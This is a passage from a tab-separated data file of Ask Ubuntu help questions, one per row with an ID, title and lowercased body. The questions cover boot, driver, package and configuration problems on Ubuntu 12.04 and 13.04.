mode ) ... ..so now the question is how can i install again ubuntu ? i really need it ! and above all , how can i let work the usb live ? thanks everybody and help me !
350074	the loudspeakers on my sony vaio ( svf1421l1ew ) have n't worked since i installed ubuntu 13.04	i am very pleased to have successfully installed ubuntu on my new sony vaio laptop , but here 's the thing , the loud speakers are n't working ( they were working under windows 8 ) . but when i plug in a headset , the sound is perfect . can you tell me how to get sound without having to use the headphones ? thanks john
350081	how can i play online 3d games ?	is there some way to install unity web player on ubuntu ? ( does n't have to be made for linux )
350083	how to change firefox startpage from ubuntu 's to firefox 's ?	well , i installed ubuntu gnome remix . now i miss the `` restore previous session '' button that firefox start page has . how do i get it back ? this is what i want :
350088	v4l error with skype webcam	i need to use v4l1compat.so with skype . this used to work , but now running this : ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so /usr/bin/skype produces this : error : ld.so : object '/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so ' from ld_preload can not be preloaded : ignored . ( the object files are definitely present ) . current workaround : make an ubuntu 12.04 livecd/usb . copy all of the libraries and the skype binary into a folder on the desired system . then , run ld_preload= $ ( pwd ) /lib/v4l1compat.so ld_library_path= $ ( pwd ) /lib ./skype where lib is the subfolder into which the libraries have been copied . list of required libraries : http : //pastebin.com/iyv33db7 this works perfectly , but obviously this is n't ideal . any better or more permanent solutions ?
350089	uninstall linux os 's with grub	is there a way to uninstall my 3 linux os 's : ubuntu , linux mint and pear os ( pear os 's partition somehow got formatted , just the partition , not the os ) with grub so i can install everything freshly ? i made a big mess and i think that i need to reinstall it freshly , i got a linux mint live usb in case of emergency . the real problem is that i also got windows 8 and i do n't wan na lose any files there . summary : how do i completely delete my linux operative systems along with grub to reinstall it freshly ?
350094	building maven from source	i 'm trying to build maven from source ( on ubuntu 12.04 ) following the tutorial : http : //maven.apache.org/guides/development/guide-building-m2.html i installed a previous version of maven using sudo apt-get install maven i then checked out maven using : git clone https : //git-wip-us.apache.org/repos/asf/maven.git maven i then built maven using maven according to the apache guide , so i cd into the checkout version of maven and did : sudo mvn install this seemed to work fine , no errors or anything , but when i do mvn -version my output is : apache maven 3.0.4 maven home : /usr/share/maven java version : 1.7.0_40 , vendor : oracle corporation java home : /usr/lib/jvm/jdk1.7.0_40/jre default locale : en_us , platform encoding : utf-8 os name : `` linux '' , version : `` 3.5.0-37-generic '' , arch : `` amd64 '' , family : `` unix '' which is not the version i checked out , it 's the version of maven i got from apt-get . what exactly did mvn install do ? where did it install maven to , and how do i update the mvn command ? i 've been digging through the output of mvn-install . it seems it 's creating jar files , for example , some of the outputs are : [ info ] installing /opt/maven/maven-core/target/maven-core-3.1-snapshot.jar to /root/.m2/repository/org/apache/maven/maven-core/3.1-snapshot/maven-core-3.1-snapshot.jar [ info ] installing /opt/maven/maven-core/pom.xml to /root/.m2/repository/org/apache/maven/maven-core/3.1-snapshot/maven-core-3.1-snapshot.pom if i cd into /root/.m2/repository/org/apache/maven/maven-core and do a ls -la i see drwxr-xr-x 9 root root 4096 sep 25 15:31 . drwxr-xr-x 33 root root 4096 sep 25 15:31 .. drwxr-xr-x 2 root root 4096 sep 25 15:30 2.0 drwxr-xr-x 2 root root 4096 sep 25 15:30 2.0.1 drwxr-xr-x 2 root root 4096 sep 25 15:30 2.0.6 drwxr-xr-x 2 root root 4096 sep 25 15:30 2.0.9 drwxr-xr-x 2 root root 4096 sep 25 15:31 2.2.1 drwxr-xr-x 2 root root 4096 sep 25 15:30 3.0 drwxr-xr-x 2 root root 4096 sep 25 15:31 3.1-snapshot the last entry seems really suspicious . if i change directory into that and list it 's contents i see : -rw-r -- r -- 1 root root 557420 sep 26 08:45 maven-core-3.1-snapshot.jar -rw-r -- r -- 1 root root 7270 sep 26 08:44 maven-core-3.1-snapshot.pom -rw-r -- r -- 1 root root 706 sep 26 08:45 maven-metadata-local.xml -rw-r -- r -- 1 root root 186 sep 26 08:45 _maven.repositories which is different then what the contents of /root/.m2/repository/org/apache/maven/maven-core/3.0 are . they are : -rw-r -- r -- 1 root root 6629 sep 25 15:30 maven-core-3.0.pom -rw-r -- r -- 1 root root 40 sep 25 15:30 maven-core-3.0.pom.sha1 -rw-r -- r -- 1 root root 154 sep 25 15:30 _maven.repositories
350098	installing 13.4 on macbook dualboot : grub bootloader installation failed	previously i had ubuntu 12.4 running as second os on a second boot partition , installed with bootcamp ( no refit ) . now i tried to install ubuntu 13.4 ( amd64 ) from usb but it failed to install grub ( 'bootloader installation failed ' ) on /dev/sda3 ( the fresh ubuntu partition ) . since there is no further error message , i 'm kind of puzzled about this . when i startup the macbook and choose `` windows '' ( this name is due to bootcamp and was that way with 12.4 all the time ) from the efi boot menu , grub `` loads '' but says : error , file not found i googled around and tried a few things : running the live-ubuntu and manually installing grub via : sudo mount /dev/sda3 /mnt sudo grub-install /dev/sda3 -- [ b/r ] oot-directory= '' /mnt '' -- force ... did n't work . apparently it installed grub but spit out a lot of warnings the usage of blocklists and i still could n't boot . installing refit and trying the whole installation over and over again ... did n't work . so ... any ideas why grub-install fails ? does the 64bit-version only supports ( u ) efi-boot and there are issues due to the old hardware/firmware ? the setting : macbook 5,1 ( late 2008 ) with osx 10.8 ubuntu 13.4 64bit on usb the disk is healthy ( says disk-warrior and diskutil on osx ) and the partition tables are synchronized ( refit ) update : i tried the 32bit-version : after uninstalling refit , i wasnt able to boot from usb-ununtu anymore . so i installed refind , run the installation ( i think the usb was booted with efi and not with bios because i did n't see grub before the installation ! ) and et voilรก , the bootloader installed . but : i 'm still not able to boot into the newly installed ubuntu . same as above : error , file not found . > grub rescue : ... did i kill my bootloader ? ? ! update2 : after completely removing the ubuntu partition and reassigning its space to the osx partition , refind still thinks there is a linux partition somewhere ... the usb-ubuntu still does n't show up under the macbooks bootloader ( but still under refind ) update3 : reinstalling 13.4 32bit now results in a blinking underscore right after refind , for booting the installation as well as the live-version from usb . wtf ?
350100	installing ubuntu on new hdd , replacing it with old hdd running windows	my question is related to : direct install of ubuntu into new hdd i have a laptop with windows 8 . i would like to replace the hdd with a new one and install ubuntu on it . my question is if i late replace the ubuntu-hdd with the windows-hdd will windows 8 run without problems ? will intalling ubuntu change bios or something on the pc that can cause any problems when i insert the old hdd with windows ? thanks
350101	how do i fix a mount that is now failing	one of my drives that used to mount , no longer mounts and if possible , i would like to get my data from the drive as that is where my java projects and other things are . my current /etc/fstab looks like : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=3327438c-aa5e-400f-82d1-f45e1797209c / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=ffc7c03a-f85b-477f-8f97-a9879e021783 none swap sw 0 0 my /etc/mtab looks like : /dev/sdc1 / ext4 rw , errors=remount-ro 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 none /run/user tmpfs rw , noexec , nosuid , nodev , size=104857600 , mode=0755 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 gvfsd-fuse /run/user/gccrowd/gvfs fuse.gvfsd-fuse rw , nosuid , nodev , user=gccrowd 0 0 /dev/sdb2 /media/gccrowd/new\040volume fuseblk rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 /dev/sdb1 /media/gccrowd/new\040volume1 fuseblk rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 /dev/sdd1 /media/gccrowd/e070dba970db84a6 fuseblk rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 /dev/sdd7 /media/gccrowd/94b4c1d7b4c1bbcc fuseblk rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 /dev/sdd5 /media/gccrowd/8ee8ea51e8ea36dd fuseblk rw , nosuid , nodev , allow_other , default_permissions , blksize=4096 0 0 the message i get is as follows : http : //prntscr.com/1th87x system information : $ uname -a linux brksfwr-desktop 3.5.0-17-generic # 28-ubuntu smp tue oct 9 19:31:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux any help would be appreciated .
350105	partition resize after ubuntu on windows8	i have got a weird problem and i ended up getting 3 partitions after installing ubuntu on windows 8 . in sequence : 1. windows 8 - main partition 2 . grub - 1 mb 3. ubuntu - 38 gb + swap ( 5 gb ) 4 . 20 gb partition which i had partitioned before installing ubuntu thinking that i will install ubuntu on this partition ( the ubuntu 13.04 got installed on original c : \ drive itself and took out 38.12 gb . ) here is my prob : i want to move 20 gb partition to c drive and make total size of ubuntu as 20 gb instead of current 38 gb .
350106	13.04 installed from live-usb fails to boot	good day all . i recently installed , rather tried to install , 13.04 on my laptop . i installed from live-usb , created with lili creator . the installation seems to go well . during the process i think i saw sth . like `` layer.desktop failed to read files , package will not be included . you might wan na shoot the dev a bug-rep '' for a while , then it continued and quit with saying `` done , reboot now '' . i chose to use it as my only os , wiping my hdd . i also chose to encrypt the installation . then when i boot i get to the point where i need to enter my boot-encryption-key , then the purple ubuntu-screen shows up , the one with the white/orange dots . then the upper two thirds of the screen go black and the lower third shows the default desktop background . then nothing else happens anymore . # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # . . . . . . . . . . . . . . . . . . . . . . . . . . looks sth like this . i got an adm graphics card , 4 cores , 4 gig ram . live it all works fine . thankful for all your advice .
350107	dell inspiron 1545 not detecting wifi networks . ubuntu 13.04 64-bit	i just installed ubuntu 13.04 onto my dell inspiron 1545 . i 've tried almost everything on askubuntu with no luck . my wifi network is not being detected at all and i can not manually add it . please help !
350108	ubuntu wo n't install my program	i just downloaded a program . i am trying to install it but keep getting this & downarrow ; error . now i know what your thinking ... '' how can this idiot not know this '' ? well i do know the answer , but the file cabinet in my brain is locked and i lost the key . so for now the answer escapes me . as you can see from the image above , my courser is pointing to the file in question . it is clearly right there ... so please , can someone tell me what i am doing wrong ... thanks , and if you find my key , please return it !
350109	fresh install on dell laptop	i have a dell inspiron 14r laptop that came with ubuntu 11.1 pre-installed . i upgraded it to ubuntu 12.04 -thorugh the update manager- and everything seems to work fine including my touchpad and it advanced features ( scrolling , tapping ) . for things of life i have to format my hard drive , and i did a fresh install using the installer available at ubuntu site . everything seems to work fine except that now my touchpad works only as a regular one ( not advanced features , and i ca n't disable either ) , and if i run xinput list i do n't see the touchpad at all . that makes me think that the out-of the-box install has some pre-installed packages that gets everything working smoothly , and now that i formatted my drive i lost them . are there any required packages to install on a dell inspiron laptop ? update : anybody knows if that is related to the ppa for the dell team ?
350110	audio works but indicator and sound settings not working	i 've been messing around trying to get a firewire audio interface to work on ubuntu and during the process my indicator volume and outputs and inputs in sound settings are all greyed out and my keyboard volume/mute hotkeys do n't work anymore . audio still functions though . any thoughts ?
350114	ubuntu button is too slow	when i push ubuntu button , it sometimes takes the menu up to 10 seconds to appear . or at least 4 seconds in average . how do i make it faster ?
350115	how to get lastest netbeans version for script ?	i want to create bash script which downloads latest stable netbeans full version without knowing its version number . it could be useful if in netbeans server existed installer like netbeans-latest.sh but do n't . ideas ?
350117	starting a script with a keypress without an x server	i am looking for a way to bind any sequence of keys to an action that will run a script . i need to accomplish this on a ubuntu 12.10 server which does not have x. i have looked into upstart however i am unable to find an event that satisfies my needs .
350118	stuck on `` starting hwactivator * [ done ] message - login window does not appear	i can not login . if i let the normal boot , after the gru window , i have the `` starting hwactivator * [ done ] message ; if i try the recovery mode i can not enable internet access and it does not recognize my username+password if i try ctrl+alt+f1 . if i try boot with a preavious ubuntu version , i have the login window . nevertheless , when entering the password , it returns `` permission denied '' . if i enter a wrong password , the custom message of wrong password appears . if i try mount the ubuntu partition with a live usb key using gksudo nautilus i still in hot water because i still do not having permission to access my data . if i try change the permissions with sudo chmod -r a+rw /media/mycrazypartitionname i still having the permission denied message . i have a windows partition and it works perfectly . please , any suggestion ? ============================================= i also found this ubuntu-gets-stuck-in-a-login-loop but the point is that the system returns the permission denied message when i try to login using the prompt or any preavious ubuntu version . any idea ?
350119	ubuntu kernel question	since ubuntu is officially supported on nexus , does it use the nexus kernel or does ubuntu use its own ( or modified ) kernel ? i am a dev and am looking to port this to my low end phone . thx
350121	sound stop working - alc892	some times my sound is muted , and i need reboot many times to back work . but today , nothing happens/worked . i try `` everything '' like sound troubleshooting , etc . â ~ cat /proc/asound/card0/codec* | grep codec codec : realtek alc892 â ~ lsmod | less module size used by rfcomm 47562 0 bnep 18240 2 bluetooth 212001 10 rfcomm , bnep binfmt_misc 17541 1 kvm 422160 0 ppdev 17114 0 sp5100_tco 13792 0 joydev 17694 1 microcode 23030 0 xpad 18182 0 ff_memless 13098 1 xpad psmouse 102541 0 serio_raw 13216 0 k10temp 13174 0 edac_core 53053 0 edac_mce_amd 23548 0 snd_hda_codec_hdmi 32476 1 parport_pc 32867 1 asus_atk0110 18079 0 i2c_piix4 13302 0 snd_hda_codec_realtek 79855 1 fglrx 5294799 140 mac_hid 13254 0 amd_iommu_v2 19228 1 fglrx wmi 19257 0 snd_hda_intel 34063 5 snd_hda_codec 135141 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 17765 1 snd_hda_codec snd_pcm 97523 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13325 0 snd_rawmidi 30750 1 snd_seq_midi snd_seq_midi_event 14900 1 snd_seq_midi snd_seq 61931 2 snd_seq_midi , snd_seq_midi_event snd_timer 29990 2 snd_pcm , snd_seq snd_seq_device 14498 3 snd_seq_midi , snd_rawmidi , snd_seq snd 83674 19 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 15092 1 snd snd_page_alloc 18573 2 snd_hda_intel , snd_pcm lp 17800 0 parport 46563 3 ppdev , parport_pc , lp hid_generic 12541 0 usbhid 47259 0 hid 100815 2 hid_generic , usbhid pata_via 13702 0 ahci 25869 4 pata_atiixp 13205 0 libahci 27338 1 ahci r8169 62741 0
350124	error compiling vlc players on ubuntu 12.04 .	when i issue this command for dependent libraries for vlc player sudo apt-get build-dep vlc the error i get in return is : the following packages have unmet dependencies : libpulse-dev : depends : libpulse0 ( = 1:1.1-0ubuntu15.1 ) but 1:1.1-0ubuntu15.2 is to be installed depends : libpulse-mainloop-glib0 ( = 1:1.1-0ubuntu15.1 ) but 1:1.1-0ubuntu15.2 is to be installed libudev-dev : depends : libudev0 ( = 175-0ubuntu9.1 ) but 175-0ubuntu9.2 is to be installed e : build-dependencies for vlc could not be satisfied . i will be deeply grateful for any help .
350126	setting xampp gui in ubuntu 13.04	i already try creating xampp gui in ubuntu 13.04 using this tutorial http : //freshtutorial.com/add-gui-xampp-control-panel-ubuntu/ but still it gives an error file does not exist when creating the .desktop file . pls help .
350128	password reset but do n't get passed login screen	i reset the admin password in recovery mode . when i try to log in after reboot , i remain in the login screen and do n't get a wrong password message . anybody knows what is going on ? thanks
350130	vi editor messed up.. even the old vi is not working now	i am a newbie in ubuntu . i am using a windows xp machine ( 32 bit ) os and in that i installed vmplayer and got iso image of ubuntu 12.04 ( downloaded from online ) . i started the ubuntu and everything was fine . i heard where is issue with vi editor for that we need to update / install vim . first i tried sudo apt-get update , it was throwing many connection errors . then somewhere i read to remove the vim-tiny and do a install of vim-full again . while doing i completely messed up with the vi . now , even the old vi is not working . how to fix it ? .
350134	i stopped a process and now my desktop does n't work	i stopped a process from system monitor because my computer was overheating . i 'm new with ubuntu ( 13.04 ) i wo n't be messing with things in the future : p so basically i ca n't see the launcher or anything for that matter . i can only use a couple shortcuts like ctrl+alt+t ( that 's how i opened chromium ) or ctrl+alt+supr . i ca n't change between windows , see the top bar or search my computer with super . everything works fine in guest , though . i 'm not sure what i stopped , i think it was something related to compiz or gnome which was taking considerable memory . i 've deleted and installed compiz several times , i 've updated and upgraded everything . i tried to install gnome again but it said it would take more than 500mb , so i probably did n't have whatever i was going to download in the first place . i 've reseted unity and replaced compiz with no result . i managed to get some features using metacity -- replace , but not much . help d : thanks .
350135	how do i install ubuntu from usb from scratch ?	i want to install ubuntu from a usb from startup . without having windows already installed .
350138	error while installing ubuntu as separate os on my pc ?	recently i downloaded ubuntu 12.04 desktop-i386 and made live cd of it and it worked correctly but when i tried to install it on my pc error comes . i do n't know what is happening . these are the last lines of the log can any one tell me what is exact error and how can i fix it 09-26 07:13 error tasklist : 'nonetype ' object has no attribute 'get_info'
350139	i can not find my schedule for system shut down	long time ago i set a schedule for shutting down the system at a particular time . now i need to change this time but i can not find this schedule anywhere . i checked crontab and gnome-schedule does anyone know other places or software in which i might have this schedule on ?
350140	periodically a file with name `` ^- '' written to home folder	i have been using ubuntu 12.04 lts on my system for about 5 months now . since installing , i noticed that periodically there is a file written to my home directory that contains nothing inside of it . the file name is `` ^- '' ( without the quotes ) . does anyone have any idea on how this is happening exactly ? i ca n't quite seem to track it down . any and all advice appreciated .
350141	wifi internet connection is enabled but webpages are displaying error messages	i am using ubuntu 13.04 and i connected my smartphone to my laptop with the help of hotspot . connection is established successfully , but when i am accessing webpages it 's displaying error message and in network properties an ip address is also displaying .
350142	downloading contents of the web page	i want to write a python program to download the contents of a web page , and then download the contents of the web pages that the first page links to . for example , this is main web page http : //www.adobe.com/support/security/ , and the pages i want to download : http : //www.adobe.com/support/security/bulletins/apsb13-23.html and http : //www.adobe.com/support/security/bulletins/apsb13-22.html there is a certain condition i want to meet : it should download only web pages under bulletins not under advisories ( http : //www.adobe.com/support/security/advisories/apsa13-02.html ) # ! /usr/bin/env python import urllib import re import sys page = urllib.urlopen ( `` http : //www.adobe.com/support/security/ '' ) page = page.read ( ) filehandle = open ( 'content ' , 'w ' ) links = re.findall ( r '' < a.* ? \s*href=\ '' ( .* ? ) \ '' .* ? > ( .* ? ) < /a > '' , page ) for link in links : sys.stdout = filehandle print ( ' % s ' % ( link [ 0 ] ) ) sys.stdout = sys.__stdout__ filehandle.close ( ) os.system ( `` grep -i '\/support\/security\/bulletins\/ ' content > > content1 '' ) i 've already extracted the link of bulletins into a content1 , but do n't know how to download the content of those web pages , by providing content1 as input . the content1 file is as shown below : - /support/security/bulletins/apsb13-23.html /support/security/bulletins/apsb13-23.html /support/security/bulletins/apsb13-22.html /support/security/bulletins/apsb13-22.html /support/security/bulletins/apsb13-21.html /support/security/bulletins/apsb13-21.html /support/security/bulletins/apsb13-22.html /support/security/bulletins/apsb13-22.html /support/security/bulletins/apsb13-15.html /support/security/bulletins/apsb13-15.html /support/security/bulletins/apsb13-07.html
350144	how to fix os ( ubuntu hard drive not present error ) in efi ?	i am using dell-inspiration 14r , last day , when i shutdown ubuntu , next time it did n't boot , it said hard-drive not found , try reseating it . but it , again , could detect the hard-drive from boot menu.i tried many things , nothing seemed to work . at last , i downloaded a booted lubuntu 13.04 and installed it . now the grub bootloader menu comes up asking me which to boot . i changed boot option 's from legacy to uefi . now in both the booting system , ubuntu says that boot/efi is not ready , press s to continue.how to fix this error ? also how installing lubuntu get 's me to the login screen again ? edit : i also found that when i try to boot in efi mood , it tells start pxe over ipv4 now , when i enter to the boot menu i see at # 1 ubunt ( hard drive not present ) that is bios is not detecting my os . so the problem here is , ubuntu is n't been able to boot itself.that 's why installing lubuntu i was able to boot . now what should i do to fix this error ?
350146	questions about netatalk log file	hello i 'm using netatalk 3.0.4 on my system to allow for afp connections . the log file produced in /var/log/netatalk.log is 469.6gb ... ! this is chewing data on my drive and making backups hard to manage . i ca n't find any references in the official manual about limiting logs . my questions if i delete this file will it break netatalk ? what can i do to limit the log output of netatalk ?
350147	ubuntu desktop and touch on nexus 7 2nd gen ( 2013 )	i have n't seen any release eta for the new nexus 7 . is there any we can expect ?
350148	how can i share media from ubuntu 13.04 to windows xp	so i have set up samba successfully and i am using it for file shares but when trying to do media shares i am having issues . specifically the problem is that i can see the media folder in windows but then i ca n't go into them . i get permission denied . i have changed the /media/username to soft link to a /media/share folder and this is working . the problem is that the file system wo n't let me change permissions on a media sub directory even as root . as a result , i am trying to see if anyone else is sharing their media from a linux machine to a windows machine . see below my attempt to change the directory perms . my passport is a wd external hard drive . i can see the my passport folder in windows i just ca n't open it . soft link : root @ bigjackfly : /media # ls -ltr total 4 lrwxrwxrwx 1 root root 5 sep 25 18:41 bjackfly - > share drwxr-xr-x 4 nobody nogroup 4096 sep 25 20:48 share root @ bigjackfly : /media/share # chmod 777 my\ passport/ root @ bigjackfly : /media/share # ls -ltr drwx -- -- -- 1 bjackfly bjackfly 4096 sep 25 21:04 my passport smb.conf [ mediashare ] comment = public stuff path = /media/share browseable = yes guest ok = yes read only = no create mask = 0775
350149	edd information not available	yesterday i switch on my pc , it has dual booting windows and ubuntu 13.04. initially goes to select operating system menu ie grub menu and when i select either window or ubuntu it goes to blank screen . if i select ubuntu advanced mode and then select recovery mode it shows like that '' bios edd facility v.016 2004-jun-25 , 0 devices found , '' '' edd information not available '' kindly give suggestion to help me out the problem.. thanks..
350152	wifi does not work in kubuntu but works in ubuntu	i installed ubuntu i fixed the problem with wifi but when i install kubuntu it does not work . iwconfig : eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lspci | grep network : 02:00.0 network controller : broadcom corporation bcm4321 802.11a/b/g/n ( rev 03 ) i run kubuntu from a macbook pro early 2008 4,1
350153	ubuntu livecd does n't recognize keyboard or mouse	i have been trying to install ubuntu 13.04 from a livecd , and my keyboard and mouse i believe are n't being recognized . this is an anomaly for me as i have used livecd 's on my other computers in my house and they work fine . but the only distinction between the other computer 's in my house and the computer i 'm trying to install ubuntu on is that the computer i 'm using was custom built . thanks in advanced for any help !
350156	recording video stream using vlc	i 'm trying to download a streaming video using vlc from a bash script . the problem is that the video that is getting recorded does not have any audio . when i directly try to use vlc and enter the url using the gui i get the audio . the command i 'm using is : cvlc $ link -- sout `` # duplicate { dst=std { access=file , mux=raw , dst=/home/abhishek/video.mp4 } '' vlc : //quit ; can anybody correct the command please ?
350163	no network connections	ok , so i picked up a new republic of gamers laptop from asus today . i went to install 13.04 , but it kept crashing right before the step to select a wireless network . i burned an install disc for 12.10 and installed it , however , there are no network connections . not my wired connection or my wireless , and ifconfig only shows the local loopback address . what do i do to get the connections working ?
350164	i am trying to remove openoffice to go back to libreoffice , but i keep getting an error message	i am trying to remove openoffice and go back to libreoffice but i keep getting this error message : the following packages have unmet dependencies : libreoffice-core : depends : libreoffice-common ( > 1:4.0.2 ) but it is not going to be installed libreoffice-help-en-us : depends : libreoffice-l10n-en-us libreoffice-java-common : depends : libreoffice-common but it is not going to be installed libreoffice-l10n-en-gb : depends : libreoffice-common but it is not going to be installed libreoffice-l10n-en-za : depends : libreoffice-common but it is not going to be installed e : unmet dependencies . try 'apt-get -f install with no packages ( or specify a solution ) . and then when try running apt-get -f install i get this : errors were encountered while processing : /var/cache/apt/archives/libreoffice-common_1 % 3a4.0.2-0ubuntu1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
350165	trying from usb	so , i am trying to create a bootable usb drive with ubuntu . i plan on getting a new computer soon so i want to format and then install ubuntu on my current computer . i currently am trying to familiarize myself with the new ubuntu ( i used an older version way back when i was like 13 ) and i want to just load from the usb instead of installing for now . the problem im running into is that once i get past language selection , the text screen that pops up after that it jumps to the loading screen and then jumps back into the text screen saying something along the lines of `` panic '' and `` reverting to text screen . '' anybody know whats going on and how to fix it ?
350167	installing ms office 2013 on ubuntu 12.04 lts	i am trying to install microsoft office 2013 on ubuntu 12.04 lts ( 32-bit ) . i have downloaded an iso file of said product and installed wine1.4-i386 using the apt-get command on the terminal . the question is i do n't know the steps how to install it . i ca n't get much tutorials on internet how msoffice2013 can be installed on ubuntu . if any versions of wine is n't an option , what other options can be used to run microsoft office 2013 ?
350172	virtualbox wo n't start in ubuntu 13.04	i am trying to run virtualbox so i can install a copy of windows xp for school . i can get through setting up a new vm but when i try to start it there 's a problem with kernels . failed to open a session for the virtual machine windows xp . the virtual machine 'windows xp ' has terminated unexpectedly during startup with exit code 1 . result code : ns_error_failure ( 0x80004005 ) component : machine interface : imachine { 22781af3-1c96-4126-9edf-67a020e0e858 } that 's the virtualbox error then there 's one that says : error in subliboslnit kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing /etc/init.d/vboxdrv setup as root . if it is available in your distribution , you should install the dkms package first . i have ran that and get errors everytime . i dont know how to change the permissions if thats the problem .
350175	minecraft pocket edition on ubuntu touch ?	does anyone know if minecraft pocket edition is on ubuntu touch ? because i am thinking of installing it but do n't want to lose all my worlds .
350181	ubuntu 12.04 desktop loads pretty slow after password entry	well , i have an ubuntu 12.04 running on a core i7 laptop , with an ssd disk . the laptop is a dual-boot . i experience a very large delay between the password entry and the desktop showing up . in general , the process looks like this : grub loads fast . i choose ubuntu from the list . password prompt loads fast . i enter the password for my user . the computer kinda hangs . the wifi is flashing , but the hard drive light is not flashing a lot . this takes about 30-40 seconds . the desktop loads in a flash i 've experienced this issue in the past , with my standard hdd . then i removed ubuntuone as advised in a thread that i 've seen . this seems to have helped for a while . then i migrated to the ssd . the computer loaded pretty fast for a while , then this started happening . i do n't think that it is related to the ssd , though . i 'm adding a link to a bootchart image : http : //i.imgur.com/ew97zo6.png ======================= while i was troubleshooting this , i noticed that my username shows up as [ invalid utf-8 ] in the top right corner of the screen . these are the cases when the desktop loads with a delay . sometimes , the desktop manages to load fast . in this case the username is shown normally . the [ invalid utf-8 ] seems to be a known bug , but i was not able to find a working solution . thank you for your time . ============================= i ended up completely reinstalling the os . this solved the problem .
350187	juju credential error masage	please check your credentials or use 'juju bootstrap ' to create a new environment . error details : no reachable servers . error : unable to connect to environment `` maas '' . please check your credentials or use 'juju bootstrap ' to create a new environment . error details : no reachable servers i have 2 nodes are ready on maas server and when i run juju bootstrap one of them going to located to root user but i still got the error massage i mentioned above this my environment file , environments : maas : type : maas maas-server : 'maas-server-ip-address/maas ' ; maas-oauth : 'vzgaatkw9yftwmrdxb : z9ehbegsbjmnjbp5r4:9adtb7gmu39fvpbkhsbpynt9fatfgscs ' admin-secret : 'my-root-password' default-series : 'precise' edit : the out put of juju bootstrap -v -- debug it 's too much but the end of output is : warning juju.provider.maas environ.go:181 picked arbitrary tools & { `` 1.14.1-precise-amd64 '' `` 172.26.0.10:80/maas/api/1.0/files/âś ; } 2013-09-26 13:06:41 debug juju.provider.maas environ.go:267 maas user data ; 9888 bytes 2013-09-26 13:06:41 debug juju.provider.maas environ.go:273 started instance `` /maas/api/1.0/nodes/node-bb337654-25dc-11e3-ac82-70f39519a2c5/ '' 2013-09-26 13:06:41 info juju supercommand.go:284 command finished my environment file again is environments : maas : type : maas maas-server : '172.26.0.10:80/maas/ ' ; maas-oauth : 'p3pesub2ajpwvkl7ph : bzawke8fydgasbl8nq : zkzmjx5xvptmzrpgy2lqva5w6bawpcdj' admin-secret : 'admin-password' default-series : precise authorized-keys-path : ~/.ssh/id_rsa.pub my server 's hostname is hu , and i think my problem is the admin password because i have read it has to be replaced with a random pass-phrase . thanks for your help .
350189	ubuntu 13.04 after gnome panel installation package manager and shell is gone	i just did a fresh installation of 13.04 in my laptop . it was fine . but i wanted to have the bottom bar , so i installed gnome-panel . after a restart i just see the wall-paper . ctrl+alt+tab does n't show the shell either . ca n't we have both unity and gnome-panels together ?
350191	making the terminal interface non closable	let me explain in more details . what i want to do is when i click the close button on the terminal interface , the terminal should not close . it should remain open . how can i do this . thanks in advance .
350192	support of ubuntu 13.04	ubuntu 13.04 receives 9 months of support . what 's this support ? i mean is it disadvantageous to use ubuntu 13.04 then , & rather use the older ubuntu 12.04 ? ?
350196	how can i install pygame 1.9.2 on ubuntu 13.04 ?	the python-pygame package contains version 1.9.1release , but i need features from 1.9.2 . is there a ppa available for the latest pygame release ? thanks in advance !
350197	where 's my app ?	my app has been successfully approved in the review process , and been published . however , i cant see it in the software center or the online ubuntu software center catalogue : ( the app name is sequence master anyone have any idea why ? thanks .
350199	will ubuntutouch run on the nexus 5 device ?	now , you can see my question above . will ubuntu touch run on the nexus 5 device . and/or will canonical support the nexus 5 device ? because i will buy a nexus 5 and i would like to use ubuntu touch on it . greetz and thanks . ralf lange
350201	how to fix ‘requires installation of untrusted packages’ error in ubuntu 1304	i tried installing application fom app store , and i got the requires installation of untrusted packages error .
